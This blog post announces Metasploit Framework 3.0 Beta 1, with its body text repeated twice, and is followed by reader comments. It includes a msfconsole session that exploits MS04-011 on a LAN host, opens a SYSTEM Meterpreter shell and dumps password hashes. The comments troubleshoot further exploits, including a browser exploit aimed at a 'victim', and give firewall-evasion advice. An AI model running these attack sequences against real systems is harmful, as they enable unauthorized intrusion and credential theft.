Metasploit Framework 3.0 Beta 1
We are happy to announce that the first beta release of the 3.0 tree is now ready for download. This release contains numerous bug fixes and improvements to the previous alpha release. 3.0 Beta 1 is fully compatible with Linux, BSD, Mac OS X, and Windows using our custom Cygwin installer. If you would like to discuss the beta release with other users, please subscribe to the framework-beta mailing list by sending a blank email to framework-beta-subscribe[at]metasploit.com.
If you are attending the Black Hat security conference in Las Vegas, I will be presenting on the new functionality available in this release at 4:45pm on August 2nd. This talk is part of the /dev/random track and is entitled Metasploit Reloaded.
Some quick highlights compared to version 2.6:
- All modules are organized in a directory heirarchy
- Common Meterpreter modules have been merged into 'stdapi'
- New Meterpreter features significantly help with penetration testing
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules
- Support for recent browser bugs :-)
This release can be obtained from the Metasploit web site.
Unix users may need to install the openssl and zlib ruby modules for the
Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
User of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.
Mac OS X users should install GNU Readline prior to rebuilding Ruby. Although it is possible to use the Framework without readline, the tab completion features in msfconsole work great and can save quite a bit of time.
Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.
A quick demonstration of using msfconsole with meterpreter:
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) ) ||--|| *
=[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
=[ 4 aux
msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444)
[*] The DCERPC service did not reply to our request
Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[snip]:::
meterpreter > cd c:meterpreter > ls
Listing: c:
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ]
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr
meterpreter > kill 2676
Killing: 2676
If you are attending the Black Hat security conference in Las Vegas, I will be presenting on the new functionality available in this release at 4:45pm on August 2nd. This talk is part of the /dev/random track and is entitled Metasploit Reloaded.
Some quick highlights compared to version 2.6:
- All modules are organized in a directory heirarchy
- Common Meterpreter modules have been merged into 'stdapi'
- New Meterpreter features significantly help with penetration testing
- New type of "passive" exploits (browser, sniffer, ids attacks)
- Denial of service modules (ms05-035 and unpatched RRAS)
- Support for multiple shells per exploit with passive modules
- Support for recent browser bugs :-)
This release can be obtained from the Metasploit web site.
Unix users may need to install the openssl and zlib ruby modules for the
Framework to load. If you are using Ubuntu, run the following commands:
# apt-get install libzlib-ruby
# apt-get install libopenssl-ruby
User of other distributions or Unix flavors may want to grab the latest version of ruby from www.ruby-lang.org and build it from source.
Mac OS X users should install GNU Readline prior to rebuilding Ruby. Although it is possible to use the Framework without readline, the tab completion features in msfconsole work great and can save quite a bit of time.
Windows users will need to exit out of any running Cygwin-based applications before running the installer or using the Framework. We really tried to work with the native ruby interpreter for Windows, but numerous io/readline/stdin issues came up and we will try again once the code base gets a little more stable.
A quick demonstration of using msfconsole with meterpreter:
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) ) ||--|| *
=[ msf v3.0-beta-1
+ -- --=[ 86 exploits - 90 payloads
+ -- --=[ 16 encoders - 4 nops
=[ 4 aux
msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > set RHOST 192.168.0.106
RHOST => 192.168.0.106
msf exploit(ms04_011_lsass) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler..
[*] Getting OS information...
[*] Trying to exploit Windows 2000 LAN Manager
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.145:41829 ->
192.168.0.106:4444)
[*] The DCERPC service did not reply to our request
Loading extension stdapi...success.
meterpreter > getuid
Server username: SYSTEM
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:[snip]:::
meterpreter > cd c:meterpreter > ls
Listing: c:
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 09 11:03:03 CDT 2004 MSDOS.SYS
40777/rwxrwxrwx 0 dir Sat Oct 09 11:21:49 CDT 2004 RECYCLER
40777/rwxrwxrwx 0 dir Sat May 21 18:12:30 CDT 2005 WINNT
100666/rw-rw-rw- 195 fil Sat Oct 09 05:38:57 CDT 2004 boot.ini
100444/r--r--r-- 214416 fil Mon Dec 06 14:00:00 CST 1999 ntldr
[ snip ]
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
176 smss.exe \SystemRoot\System32\smss.exe
200 csrss.exe \??\C:\WINNT\system32\csrss.exe
224 winlogon.exe \??\C:\WINNT\system32\winlogon.exe
252 services.exe C:\WINNT\system32\services.exe
264 lsass.exe C:\WINNT\system32\lsass.exe
440 svchost.exe C:\WINNT\system32\svchost.exe
[ snip ]
1804 wins.exe C:\WINNT\System32\wins.exe
2676 logon.scr C:\WINNT\system32\logon.scr
meterpreter > kill 2676
Killing: 2676
posted by hdm at 12:36 AM
16 Comments:
Excellent !! Best exploit framework EVER !
Cool. I wish I could be at BH. Maybe you could release the conference proceedings at metasploit.com after the talk?
great work as always. Thanks again. Amir, BH typically releases the proceedings of the conferences on its website just look around :)
I was at the Black Hat brief today and it was excellent! Can't wait to play with this!
Administrators nightmare of the year? ;p
http://blogs.technet.com/photos/bluehat/images/422890/425x283.aspx
Umm i've got a problem with windows version - whenever i try do something that involves establishing network connection it writes an error message about uninitialized constant AF_INET6. Do i have to install something on my SP1? IPv6? Or its a bug? Plz anyone who knows a solution mail me at artyome1@front.ru
as above.. what causes this?
(2.6 works.. just not 3 beta..)
Connect to msfweb at http://127.0.0.1:55555/
/usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/dependencies.
rb:123:in `const_missing': uninitialized constant AF_INET6 (NameError)
from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/
dependencies.rb:131:in `const_missing'
from /usr/lib/ruby/gems/1.8/gems/activesupport-1.3.1/lib/active_support/
dependencies.rb:133:in `const_missing'
from /home/framework/lib/rex/socket.rb:127:in `to_sockaddr'
from /home/framework/lib/rex/socket/comm/local.rb:51:in `create_by_type'
from /home/framework/lib/rex/socket/comm/local.rb:24:in `create'
from /home/framework/lib/rex/socket.rb:44:in `create_param'
from /home/framework/lib/rex/socket/tcp_server.rb:38:in `create_param'
from /home/framework/lib/rex/socket/tcp_server.rb:27:in `create'
from /home/framework/lib/rex/proto/http/server.rb:123:in `start'
from /home/framework/lib/rex/service_manager.rb:80:in `start'
from /home/framework/lib/rex/service_manager.rb:24:in `start'
from /home/framework/lib/msf/ui/web/driver.rb:116:in `run'
from /home/framework/msfweb:56
Not sure what the cause is, I can't reproduce on my systems here. It must be Ruby's socket class not defining a constant when certain conditions are met. The fix is already in the source tree and will be included in the next release.
Awesome tool. You guys rock. I'd love to see an auxiliary module added that will let me launch a payload against a win32 host with a username and password. In a pen test you 0wn Host 1 and get the creds. Host 2 is fully patched, but has the same creds as host 1. I'd like to supply the creads and use meterpreter on the box rather than other less stealthy tools.
Well.... yea. i tried the new metasploit framework (3.0) snd when i enter set payload den the payload name and den i hit exploit. but mean while it says i didnt set a payload when i did! can some1 explain what is going on.
here let me show u what i mean:
msf exploit(ms06_040_netapi) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf exploit(ms06_040_netapi) > exploit
[-] Exploit failed: A payload has not been selected.
The correct option name is PAYLOAD, not payload, but we added a patch to prevent confusion (it will accept either case now, but you only get tab completion when its properly cased).
hdm i want to ask you something.
[*]Starting bind handler.
[-]Exploit failed: uninitialized constant AF_INET6.:(( Why? I'm running version 3.0-beta1.
Upgrade to the stable version of 3.0
use windows/browser/ie_createobject
set PAYLOAD windows/meterpreter/bind_tcp
[*] Using URL: http://88.218.94.61:8080/WmoHjEj9Zi [*] Server started. [*] Exploit running as background job.
[*] Started bind handler
msf exploit(ie_createobject) >
.the victim clicks the url with ie but i don't get any session..i get only that..
[*] Started bind handler
msf exploit(ie_createobject) >
use windows/browser/ie_createobject
set PAYLOAD windows/meterpreter/bind_tcp
[*] Using URL: http://myip:8080/WmoHjEj9Zi
[*] Server started.
[*] Exploit running as background job.
[*] Started bind handler
msf exploit(ie_createobject) >
The vivtim clicks the url with ie but I get only started bind handler and no sessionsī
Make sure the target is actually exploitable and that their firewall has been disabled. If they have an active firewall, switch to a reverse* payload instead of a bind.
Post a Comment
Links to this post:
Create a Link
<< Home